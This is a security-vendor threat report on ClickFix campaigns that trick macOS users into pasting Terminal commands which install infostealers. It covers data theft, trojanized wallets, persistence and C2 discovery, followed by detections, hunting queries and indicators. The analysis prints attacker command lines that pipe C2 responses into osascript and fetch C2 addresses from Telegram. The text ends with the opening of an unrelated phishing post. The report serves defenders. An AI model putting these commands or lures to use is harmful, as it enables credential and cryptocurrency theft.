Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix‑style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites.

These commands, which are purported to install system utilities, load an infostealing malware like Macsync, Shub Stealer, and AMOS into the targets’ devices instead. The malware then collects and exfiltrates data, including media files, iCloud data and Keychain entries, and cryptocurrency wallet keys. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at an added security risk.  

Prior iterations of this campaign delivered the infostealers through disk image (.dmg) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script‑based loader execution.

Unlike application bundles opened through Finder—which might be subjected to Gatekeeper verification checks such as code signing and notarization—scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don’t undergo the same evaluation. This delivery mechanism enables attackers to initiate malware execution through user‑driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.

In this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.

Activity overview

Initial access

Standalone websites were seen hosting pages that included a Base64-encrypted instruction for end users to run. Some sites present this information in multiple languages. As of this writing, these websites that we’ve observed are either already down or have been reported.

Figure 1: Landing page of a script campaign (domenpozh[.]net)
Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com.
Figure 3. mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.

In other instances, content that included instructions leading to malware were observed to be hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. We’ve observed that pages like macclean[.]craft[.]me were taken down relatively quickly.

Figure 4. ClickFix instruction hosted on macclean[.]craft[.]me.

Threat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as macos-disk-space[.]medium[.]com instruct users to “fix” an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.

We observed three distinct execution paths leveraging different infrastructure. We’re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as random IDs), was used in data staging, marking the staging folders as /tmp/shub_<random ID> or/tmp/<random ID>.

The underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.

The following table summarizes the key differences between the campaigns. We discuss the details of each of these campaigns in the succeeding sections of this blog.

Activity or techniqueLoader campaign  Script campaignHelper campaign
Initial installationNo file written on disk  No file written on disk/tmp/helper /tmp/update
Condition to exit executionRussian keyboard detected  Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail)Sandbox detected
Data staging/tmp/shub_<random ID>/tmp/out.zipNone/tmp/<random ID>/tmp/out.zip
Persistence (Plist file created)~/LaunchAgents/com.google.keystone.agent.plist  ~/LaunchAgents/com.<random value>.plistLibrary/LaunchDaemons/com.finder.helper.plist
Bot executionPayload: /GoogleUpdateC2 pattern: <C2 domain >/api/bot/heartbeatResolves active C2 through hardcoded infrastructure and Telegram fallback   C2 domain: https://t[.]me/ax03botPayload: /.agentC2 domain: hxxp://45.94.47[.]204/api/
Exfiltration<C2 domain>/api/debug/event<C2 domain>/gate/chunk<C2 domain>/upload.php<C2 domain>/contact
Trojanized cryptocurrency appsTrezor Suite.appLedger Wallet.appExodus.app  Not applicable (handled in later loader/payload stages)Trezor Suite.appLedger Wallet.app

Loader install campaign

Since February 2026, Microsoft researchers have observed a campaign that requests a loader shell from the attacker’s infrastructure using curl once a user copies and runs ClickFix commands using Terminal. It leads to further execution of a second-stage shell script. 

This second shell script is a zsh loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. It then executes the payload using eval.

Figure 5: Shell loader.

The next-stage script also functions as a macOS reconnaissance and execution ‑control loader that first fingerprints the system by collecting the following information:

  • Keyboard locale
  • Hostname
  • Operating system version
  • External IP address

It then builds and sends a JSON object to an attacker‑controlled server containing an event name (loader_requested or cis_blocked) along with this telemetry. It also uses the presence of Russian/CIS keyboard layouts as a deliberate kill switch, reporting a cis_blocked event and stop the execution.

Figure 6: Reconnaissance loader with CIS kill switch.

If the system isn’t blocked, the script silently beacons a “loader requested” event and then downloads and executes a remote AppleScript payload directly in memory using osascript.

Figure 7: Reconnaissance loader with AppleScript payload delivery.

AppleScript infostealer

This multi-stage macOS AppleScript stealer employs user interaction-based credential capture, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. The malware further tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.

Data collection:  tmp/shub_<random ID> staging

We observed that the stealer self-identifies as “SHub Stealer” (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a “helper” utility. It then validates the entered password using the command dscl . -authonly <username>. Upon successful validation, it sends a password_obtained event to its C2 infrastructure.

The malware stages collected data under a /tmp/shub_<random ID>/ folder. The collected data includes:

  • Browser credentials
  • Notes
  • Media files
  • Telegram data
  • Cryptocurrency wallets
  • Keychain entries
  • iCloud account data

The stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at /tmp/shub_<random ID>/FileGrabber/.

The targeted file types are:

  • txt
  • pdf
  • docx
  • wallet
  • key
  • keys
  • doc
  • jpeg
  • png
  • kdbx
  • rtf
  • jpg
  • seed

Once the data collection is complete, data is compressed and exfiltrated. The stealer deletes staging artifacts to reduce forensic evidence.

Wallet exfiltration and trojanization

Subsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:

  • Electrum
  • Coinomi
  • Exodus
  • Atomic
  • Wasabi
  • Ledger Live
  • Monero
  • Bitcoin
  • Litecoin
  • DashCore
  • lectrum_LTC
  • Electron_Cash
  • Guarda
  • Dogecoin
  • Trezor_Suite
  • Sparrow

When it finds any of these applications, it stages their data for exfiltration.

The stealer was also observed replacing legitimate cryptocurrency wallets apps with attacker-controlled or trojanized ones:

  • Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc/app.zip
  • Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
  • Exodus.app is replaced by appex.zip fetched from <C2 domain>/zxc/appex.zip

These trojanized cryptocurrency wallet applications pose a serious risk to their users who might be unaware of the stealthy compromise and continue to use and transact with them.

Figure 8. Trojanized apps installation.

Persistence

For persistence, the malware creates an additional script within the newly created ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ folder.

A malicious implant named GoogleUpdate is configured to RunAtLoad disguised as an agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS/SuspMalScript.

A new property list (plist), /Library/LaunchAgents/com.google.keystone.agent.plist,is then staged to run this agent.

Figure 9. Plist staging.

The executable is then given permission to run with the following command:

Figure 10. GoogleUpdate granted permission to run.

Once com.google.keystone.agent.plist loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at <C2 domain>/api/bot/heartbeat, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.

The C2 server can return Base64-encoded instructions, which the script decodes and executes locally and deletes traces, enabling remote command execution on demand. This process creates a persistent remote-control channel, where the attacker could push arbitrary shell code to the infected device at any time.

Figure 11. Backdoor style bot with heartbeat driven payload execution.

Script install campaign

In April 2026, Microsoft researchers observed an ongoing campaign that runs a heavily obfuscated infostealer when users run it through Terminal.

The attack begins with a social‑engineering instruction containing a Base64‑encoded command.

When decoded, this instruction resolves a one‑line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.

Figure 12. Payload delivery.

The retrieved script.sh payload is launched directly from the network stream, with no intermediate file written to disk. It’s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64 encoded script under a plist staged at ~/Library/LaunchAgent/com.<random name>.plist.

Figure 13. Payload staged into a plist.

The persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:

Figure 14. AppleScript stager (decoded).

This AppleScript functions as a C2 discovery and execution orchestrator for a macOS malware campaign. The AppleScript is used as the control layer and standard Unix tools for network interaction and execution. Its first role is C2 discovery. It iterates over a list of potential server identifiers (for example {0x666[.]info}), constructs candidate URLs (http://<value>/), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (-d “check”). This connectivity test is performed through the following command:

/usr/bin/curl -s -H “<User-Agent>” -d “check” –connect-timeout 5 –max-time 10 <candidate_url>

Figure 15. Initial C2 communication.

If none of the hard‑coded infrastructure responds successfully, the script falls back to Telegram‑based C2 discovery. It fetches a Telegram bot page using curl -s hxxps://t[.]me/ax03bot and extracts a hidden server identifier embedded in an HTML <span dir=”auto”> element using sed. This lets the attacker rotate C2 infrastructure dynamically.

Figure 16. Telegram-based C2 endpoint discovery.

Once a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (txid) and module identifier, then immediately pipes the server response into osascript for execution:

curl -s -X POST <C2_URL> -H “<User-Agent>” -d “<txid>&module” | osascript

This command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds if all connectivity checks succeed. Overall, this isn’t a simple downloader but a resilient, infrastructure‑aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker‑controlled AppleScript logic on demand.

We observed data exfiltration to the attacker’s infrastructure on a C2/upload.php endpoint leveraging curl.

Figure 17. Exfiltration of archived data.

Helper install campaign (AMOS)

Starting at the end of January 2026 , another ClickFix campaign relied on an executable file named helper or update to run. In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed the payload using Gunzip.

Figure 18. First-stage script requested.

The first-stage script led to the retrieval of the second stage-malicious Mach Object (Mach-O) executable into the newly created /tmp/<file name> folder.

Figure 19. /tmp/helper installation.

In February 2026, this campaign retrieved the payload under a /tmp/update folder.

Figure 20. /tmp/update installation.

This malicious executable file has its extended properties removed and is then given permission to run and launch on the victim’s device.

Virtualization detection

The infection chain begins with an AppleScript based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking system_profiler and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:

  • Chip: Unknown
  • Intel Core 2
  • Virtual Machine
  • VirtualMac

If any of these indicators are present, execution is terminated early, preventing further stages from running.

Data collection and exfiltration

Like the loader install campaign, the stealer prompts the user to enter their password. It validates locally whether the entered password is correct using dscl utility.

After capturing the target user’s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies macOS Keychain databases, enabling access to stored website passwords, application secrets, and WiFi credentials.

It also collects browser authentication material from Chromium‑based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser‑based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.

 The stealer compresses collected data into a ZIP file /tmp.out.zip, which is then exfiltrated to a <C2 domain>/contact> endpoint. The stealer removes staging artifacts to reduce forensic evidence.

Figure 21. Archiving and exfiltration of data.

Wallet exfiltration and trojanization

Similar to the loader campaign, the stealer in the helper also replaces legitimate wallet apps with attackers-controlled ones:

  • Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc.app.zip.
  • Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip

Backdoor deployment and persistence

To maintain long‑term access to infected systems, the helper campaign deploys a multi‑stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.

Download and execution of the backdoor component (.mainhelper)

The persistence chain begins with the download of a second‑stage backdoor implant named .mainhelper into the current user’s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach‑O executable from an attacker-controlled endpoint (<C2 domain>/zxc/kito) and writes it as a hidden file under the user profile.

Figure 22. Second implant downloaded.

Once it’s given attributes and permissions to run, the /.mainhelper implant joins the compromised device to a C2 endpoint hxxp://45.94.47[.]204/api/. The implant executes tasks from the attacker, providing a remote-control capability to the attacker on the compromised system.

Figure 23. C2 instance.

Creation of the execution wrapper (.agent)

In addition to the backdoor binary, the stealer creates a secondary file named .agent, also placed in the user’s home directory. Unlike .mainhelper, .agent isn’t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the .mainhelper process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, .agent relaunches it.

LaunchDaemon installation (com.finder.helper.plist)

After prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a LaunchDaemon plist, stages the XML content to a temporary file (/tmp/starter), and then writes it to /Library/LaunchDaemons/com.finder.helper.plist.

LaunchDaemon plist staging and loading

LaunchDaemon is configured to run /bin/bash with the path to ~/.agent as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets correct ownership, loads the daemon using launchctl, and enables both RunAtLoad and KeepAlive.

Figure 24. Plist staging.

As a result, on every system boot, launchd runs the .agent wrapper with root privileges, which in turn ensures that the .mainhelper backdoor process is running.

Figure 25. Plist loading.

Mitigation and protection guidance

Apple Xprotect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism.


When a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:

Possible malware, Paste blocked

Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.


Organizations can also follow these recommendations to mitigate threats associated with this threat:

  • Educate users. Warn them against running instructions from untrusted sources.
  • Monitor Terminal usage. Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
  • Detect native tool abuse. Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).
  • Inspect outbound downloads. Monitor curl activity fetching encoded or compressed payloads from unknown domains.
  • Protect credential stores. Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
  • Monitor data staging. Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
  • Enable endpoint protection. Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
  • Restrict C2 traffic. Block outbound connections to suspicious or newly registered domains.

Microsoft also recommends the following mitigations to reduce the impact of this threat.

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Allow investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to mitigate attackers from using local administrator privileges to set antivirus exclusions.

Microsoft Defender detections

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

TacticObserved activityMicrosoft Defender coverage
ExecutionUser copies, pastes, and runs Base64 instructions Base64 instructions are deobfuscated Executable files are created from remote attacker’s infrastructureInstalled malware implant is executed Malicious AppleScript is retrieved from attacker infrastructureSequence of malicious instructions are executedMicrosoft Defender for Endpoint
Suspicious shell command execution
Obfuscation or deobfuscation activity
Executable permission added to file or directory
Suspicious launchctl tool activity
‘SuspMalScript’ malware was prevented
Possible AMOS stealer Activity Suspicious AppleScript activity
Suspicious piped command launched
Suspicious file or information obfuscation detected

Microsoft Defender Antivirus Trojan:MacOS/Multiverze – Created executable file
Trojan:MacOS/SuspMalScript – Malware implant downloaded by the loader campaign
Behavior:MacOS/SuspAmosExecution – Malicious file execution
Behavior:MacOS/SuspOsascriptExec – Malicious osascript execution
Behavior:MacOS/SuspDownloadFileExec – Suspicious file download and execution
Behavior:MacOS/SuspiciousActiviyGen  
Data collectionMalware collects data from bash history, browser credentials, and other sensitive foldersMultiple files are collected into staging foldersCollected data is staged and archived into a folder Staging folders are removedMicrosoft Defender for Endpoint
Suspicious access of sensitive filesSuspicious process collected data from local systemEnumeration of files with sensitive dataSuspicious archive creationSuspicious path deletion  

Microsoft Defender Antivirus Behavior:MacOS/SuspPassSteal – Suspicious process collected data from local systemTrojan:MacOS/SuspDecodeExec – Malicious plist detection
Defense evasionMalware deletes the staging paths following exfiltrationExecution of obfuscated code to evade inspection  Microsoft Defender for Endpoint   Suspicious path deletionSuspicious file or information obfuscation detected  
Credential accessMalware steals user account credential and stages files for exfiltrationMicrosoft Defender for Endpoint Suspicious access of sensitive filesUnix credentials were illegitimately accessed  
ExfiltrationMalware exfiltrates staged data using curl and HTTP POSTMicrosoft Defender for Endpoint Possible data exfiltration using curl  

Microsoft Defender Antivirus Behavior:MacOS/SuspInfoExfilTrojan:MacOS/SuspMacSyncExfil

Threat intelligence reports

Microsoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender threat analytics

From ClickFix to code signed: the quiet shift of MacSync Stealer malware.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender

Microsoft Defender customers can run the following queries to find related activity in their networks:

Initial access

//Loader campaign installation
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_any ("loader.sh?build=","payload.applescript?build=")

// Helper campaign installation
DeviceFileEvents
| where InitiatingProcessCommandLine  has_all("curl", "/tmp/helper","-o")

//Install of /update install campaign
DeviceFileEvents
| where InitiatingProcessCommandLine  has_all("curl", "/tmp/update","-o")
| where FileName== "update"

Exfiltration to C2 infrastructure

//loader campaign

DeviceProcessEvents
| where ProcessCommandLine has_all("curl", "post","/debug/event", "build_hash")

DeviceProcessEvents
| where ProcessCommandLine  has_all("curl","/tmp","post","-H","-f","build","/gate")
| where not (ProcessCommandLine has_any(".claude/shell-snapshots")) 

//script campaign 

DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("curl","-F","txid","zip","max-time")

//helper campaign
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("curl","post","-H","user","buildid","cl","cn","/tmp/")

Bot C2 installation and communication

//loader campaign - bot install
DeviceFileEvents
| where InitiatingProcessCommandLine =="base64 -d"
| where FolderPath endswith @"Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"

//loader campaign – bot communication
DeviceProcessEvents
 | where ProcessCommandLine  has_all("/api/bot/heartbeat","post","curl")

//script campaign second stage execution 
DeviceProcessEvents
 | where ProcessCommandLine  has_all("curl","POST","txid","osascript","bmodule","max-time")

//helper campaign - bot install 

//Alternate query for helper or bot update installation
DeviceFileEvents
| where  InitiatingProcessCommandLine has_all ("curl","zxc","kito")

DeviceProcessEvents
| where InitiatingProcessFileName =="osascript"
| where  ProcessCommandLine  has_all ("sh","echo","-c", "cp","/tmp/starter",".plist")

Indicators of compromise

Domains distributing ClickFix

IndicatorTypeDescription
cleanmymacos[.]orgDomainDistribution of ClickFix  instructions
mac-storage-guide.squarespace[.]comDomainDistribution of ClickFix instructions 
claudecodedoc[.]squarespace[.]comDomainDistribution of ClickFix instructions 
domenpozh[.]netDomainDistribution of ClickFix instructions   
macos-disk-space[.]medium[.]comDomainDistribution of ClickFix instructions   
macclean[.]craft[.]meDomain Distribution of ClickFix instructions
apple-mac-fix-hidden[.]medium[.]comDomainDistribution of ClickFix instructions 

Loader campaign

IndicatorTypeDescription
rapidfilevault4[.]sbsDomainPayload delivery and C2
coco-fun2[.]comDomainPayload delivery and C2
nitlebuf[.]comDomainPayload delivery and C2
yablochnisok[.]comDomainPayload delivery and C2
mentaorb[.]comDomainPayload delivery and C2
seagalnssteavens[.]comDomainPayload delivery and C2
res2erch-sl0ut[.]comDomainPayload delivery and C2
filefastdata[.]comDomainPayload delivery and C2
metramon[.]comDomainPayload delivery and C2
octopixeldate[.]comDomainPayload delivery and C2
pewweepor092[.]comDomainPayload delivery and C2
bulletproofdomai2n[.]comDomainPayload delivery and C2
benefasts-fhgs2[.]comDomainPayload delivery and C2
repqoow77wiqi[.]comDomainPayload delivery and C2
do2wers[.]comDomainPayload delivery and C2
rapidfilevault4[.]cyouDomainPayload delivery and C2
reews09weersus[.]comDomainPayload delivery and C2
pepepupuchek13[.]comDomainPayload delivery and C2
pewqpeee888[.]comDomainPayload delivery and C2
wewannaliveinpicede[.]comDomainPayload delivery and C2
datasphere[.]us[.]comDomainPayload delivery and C2
rapidfilevault5[.]sbsDomainPayload delivery and C2
coco2-hram[.]comDomainPayload delivery and C2
poeooeowwo777[.]comDomainPayload delivery and C2
korovkamu[.]comDomainPayload delivery and C2
metrikcs[.]comDomainPayload delivery and C2
metlafounder[.]comDomainPayload delivery and C2
terafolt[.]comDomainPayload delivery and C2
haploadpin[.]comDomainPayload delivery and C2
rawmrk[.]comDomainPayload delivery and C2
mikulatur[.]comDomainPayload delivery and C2
milbiorb[.]comDomainPayload delivery and C2
doqeers[.]comDomainPayload delivery and C2
we2luck[.]comDomainPayload delivery and C2
quantumdataserver5[.]homesDomainPayload delivery and C2
bintail[.]comDomainPayload delivery and C2
molokotarelka[.]comDomainPayload delivery and C2
trehlub[.]comDomainPayload delivery and C2
avafex[.]comDomainPayload delivery and C2
rhymbil[.]comDomainPayload delivery and C2
boso6ka[.]comDomainPayload delivery and C2
res2erch-sl2ut[.]comDomainPayload delivery and C2
pilautfile[.]comDomainPayload delivery and C2
bigbossbro777[.]comDomainPayload delivery and C2
miappl[.]comDomainPayload delivery and C2
peloetwq71[.]comDomainPayload delivery and C2
fastfilenext[.]comDomainPayload delivery and C2
beransraol[.]comDomainPayload delivery and C2
pelorso90la[.]comDomainPayload delivery and C2
medoviypirog[.]comDomainPayload delivery and C2
wewannaliveinpice[.]comDomainPayload delivery and C2
malkim[.]comDomainPayload delivery and C2
pipipoopochek6[.]comDomainPayload delivery and C2
hello-brothers777[.]comDomainPayload delivery and C2
dialerformac[.]comDomainPayload delivery and C2
persaniusdimonica8[.]comDomainPayload delivery and C2
hilofet[.]comDomainPayload delivery and C2
tmcnex[.]comDomainPayload delivery and C2
nibelined[.]comDomainPayload delivery and C2
pissispissman[.]comDomainPayload delivery and C2
bankafolder[.]comDomainPayload delivery and C2
perewoisbb0[.]comDomainPayload delivery and C2
us41web[.]liveDomainPayload delivery and C2
uk176video[.]liveDomainPayload delivery and C2
jihiz[.]comDomainPayload delivery and C2
beltoxer[.]comDomainPayload delivery and C2
swift-sh[.]comDomainPayload delivery and C2
hitkrul[.]comDomainPayload delivery and C2
kofeynayagush[.]com

DomainPayload delivery and C2  

Script campaign

IndicatorTypeDescription
hxxps://cauterizespray[.]icu/script[.]sh

URLPayload delivery
hxxps://enslaveculprit[.]digital/script[.]sh

URLPayload delivery
hxxps://resilientlimb[.]icu/script[.]sh

URLPayload delivery
hxxps://thickentributary[.]digital/script[.]sh  URLPayload delivery
hxxp://paralegalmustang[.]icu/script[.]shURL  Payload delivery  
hxxps://round5on[.]digital/script[.]sh  URLPayload delivery  
hxxps://qjywvkbl[.]degassing-mould[.]digital

URLPayload delivery  
hxxps://zg5mkr7q[.]apexharvestor[.]digital

URLPayload delivery  
hxxps://kvrnjr30[.]apexharvestor[.]digital

URLPayload delivery  
hxxps://yygp4pdh[.]apexharvestor[.]digital  URLPayload delivery  
hxxps://t[.]me/ax03botURLPayload delivery  
0x666[.]infoDomainPayload delivery, C2, and exfiltration
honestly[.]ink

Domain  Payload delivery, C2, and exfiltration
95.85.251[.]177

 
IP addressPayload delivery, C2, and exfiltration
pla7ina[.]cfdDomainPayload delivery, C2, and exfiltration
play67[.]ccDomainPayload delivery, C2, and exfiltration

Helper campaign

Indicator Type Description 
rvdownloads[.]com  Domain Payload delivery 
famiode[.]com  Domain Payload delivery 
contatoplus[.]com  Domain Payload delivery 
woupp[.]com  Domain Payload delivery 
saramoftah[.]com  Domain Payload delivery 
ptrei[.]com  Domain Payload delivery 
wriconsult[.]com  Domain Payload delivery 
kayeart[.]com  Domain Payload delivery 
ejecen[.]com  Domain     Payload delivery 
stinarosen[.]com  Domain Payload delivery 
biopranica[.]com  Domain   Payload delivery 
raxelpak[.]com  Domain   Payload delivery 
octopox[.]com  Domain   Payload delivery 
boosterjuices[.]com Domain   Payload delivery 
ftduk[.]comDomainPayload delivery 
dryvecar[.]comDomainPayload delivery 
vcopp[.]comDomainPayload delivery 
kcbps[.]comDomainPayload delivery 
jpbassin[.]comDomainPayload delivery 
isgilan[.]comDomain  Payload delivery
arkypc[.]comDomain  Payload delivery
hacelu[.]comDomainPayload delivery 
stclegion[.]com

DomainPayload delivery
xeebii[.]com  DomainPayload delivery
hxxp://138.124.93[.]32/contact  URL Exfiltration endpoint 
hxxp://168.100.9[.]122/contact  URL Exfiltration endpoint
hxxp://199.217.98[.]33/contact  URL Exfiltration endpoint
hxxp://38.244.158[.]103/contact  URL Exfiltration endpoint
hxxp://38.244.158[.]56/contact  URL Exfiltration endpoint
hxxp://92.246.136[.]14/contact  URL Exfiltration endpoint
hxxps://avipstudios[.]com/contact  URL Exfiltration endpoint
hxxps://joytion[.]com/contact  URL Exfiltration endpoint
hxxps://laislivon[.]com/contact  URL Exfiltration endpoint
hxxps://mpasvw[.]com/contactURLExfiltration endpoint
hxxps[://]lakhov[.]com/contactURLExfiltration endpoint

Update campaign infrastructure

IndicatorTypeDescription
reachnv[.]comDomainDelivery of the update install variant of the helper campaign
vagturk[.]comDomain  Delivery of the update install variant of the helper campaign  
futampako[.]comDomain  Delivery of the update install variant of the helper campaign  
octopox[.]comDomain  Delivery of the update install variant of the helper campaign  
lbarticle[.]comDomain  Delivery of the update install variant of the helper campaign  
raytherrien[.]comDomain  Delivery of the update install variant of the helper campaign  
joeyapple[.]comDomain  Delivery of the update install variant of the helper campaign  

Persistence and bot execution

IndicatorTypeDescription
45.94.47[.]204IP addressBot communication IP address
wusetail[.]comDomainHosting bot payload 
aforvm[.]comDomain Hosting bot payload
ouilov[.]com DomainHosting bot payload 
malext[.]com

DomainHosting bot payload
rebidy[.]com

DomainHosting bot payload

Payloads

IndicatorTypeDescription
 9d2da07aa6e7db3fbc36b36f0cfd74f78d5815f5ba55d0f0405cdd668bd13767  SHA-256Payload 
 7ca42f1f23dbdc9427c9f135815bb74708a7494ea78df1fbc0fc348ba2a161aeSHA-256Payload
241a50befcf5c1aa6dab79664e2ba9cb373cc351cb9de9c3699fd2ecb2afab05  SHA-256Payload
522fdfaff44797b9180f36c654f77baf5cdeaab861bbf372ccfc1a5bd920d62eSHA-256Payload

File indicators of attack

IndicatorTypeDescription
/tmp/helperFolder pathMalware staging  
/tmp/starterFolder pathMalware plist staging
~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdateFolder pathMalicious file masquerading as Google Update component
~/LaunchAgents/com.google.keystone.agent.plistPlist name Staged plist running malicious executable
~/Library/LaunchAgents/com.<random value>.plistPlist nameStaged plist running malicious executable 

References

This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and  members of Microsoft Threat Intelligence.

Learn more

The post ClickFix campaign uses fake macOS utilities lures to deliver infostealers appeared first on Microsoft Security Blog.

Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise

Phishing campaigns continue to improve sophistication and refinement in blending social engineering, delivery and hosting infrastructure, and authentication abuse to remain effective against evolving security controls. A large-scale credential theft campaign observed by Microsoft Defender Research exemplifies this trend, using code of conduct-themed lures, a multi-step attack chain, and legitimate email services to distribute fully authenticated messages from attacker-controlled domains.

The campaign targeted tens of thousands of users, primarily in the United States, and directed them through several stages of CAPTCHA and intermediate staging pages designed to reinforce legitimacy while filtering out automated defenses. The lures in this campaign used polished, enterprise-style HTML templates with structured layouts and preemptive authenticity statements, making them appear more credible than typical phishing emails and increasing their plausibility as legitimate internal communications. Because the messages contained concerning accusations and repeated time-bound action prompts, the campaign created a sense of urgency and pressure to act.  

Email threat landscape

Q1 2026 trends and insights ›

The attack chain ultimately led to a legitimate sign-in experience that was part of an adversary‑in‑the‑middle (AiTM) phishing flow, which allowed the attackers to proxy the authentication session and capture authentication tokens that could provide immediate account access. Unlike traditional credential harvesting, AiTM attacks intercept authentication traffic in real time, bypassing non-phishing-resistant multifactor authentication (MFA).

In this blog, we’re sharing our analysis of this campaign’s lures, infrastructure, and techniques. Organizations can defend against financial fraud initiated through phishing emails by educating users about phishing lures, investing in advanced anti-phishing solutions like Microsoft Defender for Office 365 and configuring essential email security settings, and encouraging users to employ web browsers that support SmartScreen. Organizations can also enable network protection, which lets Windows use SmartScreen as a host-based web proxy.

Multi-step social engineering campaign leading to credential theft

